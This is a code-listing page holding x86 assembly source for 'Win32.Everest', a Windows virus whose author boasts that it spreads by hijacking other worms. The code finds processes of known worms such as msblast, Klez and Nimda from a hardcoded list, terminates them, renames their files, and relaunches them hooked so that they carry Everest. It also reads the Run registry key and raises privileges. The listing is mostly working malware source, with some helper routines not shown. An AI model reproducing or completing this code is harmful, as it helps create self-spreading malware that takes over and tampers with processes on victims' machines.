📄 virus.c
字号:
Win32.Everest
by pkxp/CVC
lemme introduce my Everest virus, the worlds first virus
which spreads via other viruses. The idea came to my head when
I was thinking about viruses in 2003. The virus itself is not
big,and it's not complicated, I code it just to show something new.
Technical details:
1. find a known virus
2. kill and move it
3. run it in suspend mode and hook it's GetModuleNameFileA
4. resume it
5. if no more known viruses ,continue, else jump 1
6. read data from HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
7. repeat 1,2,3,4,5
8. sleep , then jump 1
So when thonse viruses spread,what they are spreading is my Everest instead!
pkxp / CVC
.386
.model flat,stdcall
option casemap:none
include useful.inc
.code
main:
@pushsz 'Everest'
push FALSE
push NULL
call CreateMutex
call GetLastError
cmp eax , ERROR_ALREADY_EXISTS
jz ExitVirus
call EverestInit
PatchFixedVirus:
mov pMem , NULL
@pushsz '\'
push offset szWinPath
push offset FixedVirus
call PatchAllVirus
push 1000*60*30
call Sleep
PatchRegRunVirus:
Invoke VirtualAlloc,0,4096,MEM_RESERVE or MEM_COMMIT,PAGE_READWRITE
or eax , eax
jz MainSleep
mov pMem , eax
call ReadRunKey ;read data from run to pMem
push NULL
push NULL
push pMem
call PatchAllVirus ;no prefix
push MEM_RELEASE
push 0
push pMem
call VirtualFree
MainSleep:
push 1000*60*15
call Sleep
jmp PatchFixedVirus
ExitVirus:
push 1
call ExitProcess
;--------------------------------------------------------------
EverestInit:
push MAX_PATH
push offset szWormPath
push 0
call GetModuleFileNameA
push 50
push offset szWinPath
call GetWindowsDirectoryA
push 50
push offset szSysPath
call GetSystemDirectoryA
call RaisePrivileges
call GetAPIz
ret
;---------------------------------------------------------------
PatchAllVirus PROC szVirusList : DWORD , szPrefix : DWORD , szPrefix2 : DWORD
LOCAL hProcess : DWORD
LOCAL szVirusPath[128] : BYTE
LOCAL szformatedPath[128]: BYTE
mov esi , szVirusList
lea edi , szVirusPath
PAVLoop:
push esi
push szPrefix2
push szPrefix
@pushsz '%s%s%s'
push edi
call wsprintf
add esp , 20
mov al , byte ptr[edi]
or al , al
jz PAVExit
lea eax , szformatedPath
push eax
push edi
call formatVirus
lea eax , szformatedPath
push eax
call OpenNT4_2k_xp_2003Virus
mov hProcess , eax
PAVNextName:
lodsb
or al , al
jnz PAVNextName
mov eax , pMem
.if eax == 0
lodsd
.else
mov eax , offset PatchVirus
.endif
push edi
push hProcess
call eax
mov al , byte ptr[esi]
or al , al
jnz PAVLoop
PAVExit:
ret 12
PatchAllVirus ENDP
;------------------------------------------------------------------
formatVirus PROC pVirusName:DWORD , pformatedName:DWORD
pushad
mov esi , pVirusName
mov edi , pformatedName
FVCopy:
lodsb
cmp al , ' '
jz FVEndCopy
or al , al
jz FVEndCopy
stosb
jmp FVCopy
FVEndCopy:
xor al , al
stosb
popad
ret 8
formatVirus ENDP
;------------------------------------------------------------------
FixedVirus:
db 'system32\msblast.exe',0 ;msblast
dd offset PatchVirus
db 'Videodrv.exe',0 ;Mimail
dd offset PatchVirus
db 'system32\runouce.exe',0 ;ChineseHack
dd offset PatchVirus
db 'system32\gone.scr',0
dd offset PatchVirus
db 'system32\hfind.exe',0 ;muma
dd offset PatchVirus
db 'system32\scam32.exe',0 ;sircam
dd offset PatchVirus
db 'killonce.exe',0
dd offset PatchVirus
db 'system32\wins\DLLHOST.exe',0
dd offset PatchVirus
db 'system32\Ravmond.exe',0 ;Lovgate
dd offset PatchVirus
db 'system32\WinGate.exe',0
dd offset PatchVirus
db 'system32\WinDriver.exe',0
dd offset PatchVirus
db 'system32\Winrpc.exe',0
dd offset PatchVirus
db 'system32\Winhelp.exe',0
dd offset PatchVirus
db 'system32\Iexplore.exe',0
dd offset PatchVirus
db 'system32\NetServices.exe',0
dd offset PatchVirus
db 'system32\winexe.exe',0
dd offset PatchVirus
db 'mmc.exe',0 ;nimda
dd offset PatchVirus
db 'system32\load.exe',0
dd offset PatchVirus
db 'system32\wqk.exe',0 ;Klez
dd offset PatchVirus
db 'system32\krn132.exe',0
dd offset PatchVirus
db 'ParticularViruses',0
dd offset ParticularVirus
db 0 ;End of virus list
;-------------------------------------------------------------------
OpenNT4_2k_xp_2003Virus PROC szVirusName : DWORD
LOCAL hProcess : DWORD
LOCAL hMods : DWORD
LOCAL szProcessName[MAX_PATH] : BYTE
LOCAL ProcessIds[128+1] : DWORD
pushad
push szVirusName
push offset szWormPath
call lstrcmpi
jz OVFailExit
lea esi , ProcessIds
push (128+1)*4
push esi
call RtlZeroMemory
push offset tmp
push 128*4 ;*4
push esi
moveax,12345678h
_EnumProcesses = dword ptr $-4
call eax ;enumerate all running processes
dec eax
jne OVFailExit
add esi,4 ;esi->ProcessIDs[128]
ProcessSearch:
lodsd ;get PID
or eax , eax
jz OVFailExit
push eax
push FALSE
push PROCESS_ALL_ACCESS
call OpenProcess
or eax , eax
jz ProcessSearch
mov hProcess , eax
lea eax , hMods
push offset tmp
push 4
push eax
push hProcess
mov eax , 12345678h
_EnumProcessModules = dword ptr $-4
call eax
or eax , eax
jz OVClose
lea edi , szProcessName
push MAX_PATH
push edi
push hMods
push hProcess
mov eax , 12345678h
_GetModuleFileNameEx = dword ptr $-4
call eax
or eax , eax
jz OVClose
IsVirus:
push szVirusName
push edi
call lstrcmpi
jz OVSucExit
OVClose:
push hProcess
call CloseHandle
jmp ProcessSearch
OVFailExit:
popad
xor eax , eax
ret 4
OVSucExit:
popad
mov eax , hProcess
ret 4
OpenNT4_2k_xp_2003Virus ENDP
;---------------------------------------------------------------
PatchVirus PROC hProcess : DWORD , szVirusPath : DWORD
LOCAL szDestPath[128] : BYTE
LOCAL szformatedPath[128]: BYTE
pushad
mov eax , hProcess
or eax , eax
jz PVMoveVirus
push 0
push hProcess
call TerminateProcess
push INFINITE
push hProcess
call WaitForSingleObject
push hProcess
call CloseHandle
PVMoveVirus:
lea esi , szformatedPath
push esi
push szVirusPath
call formatVirus
lea edi , szDestPath
push esi
push edi
call lstrcpy
@pushsz '.scr'
push edi
call lstrcat
push edi
push esi
call MoveFile
push esi
call lstrlen
mov esi , szVirusPath
add esi , eax
push esi
push edi
call lstrcat
push edi
call StartVirus
popad
ret 8
PatchVirus ENDP
;-------------------------------------------------------------------
ParticularVirus:
ret 8
;-------------------------------------------------------------------
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -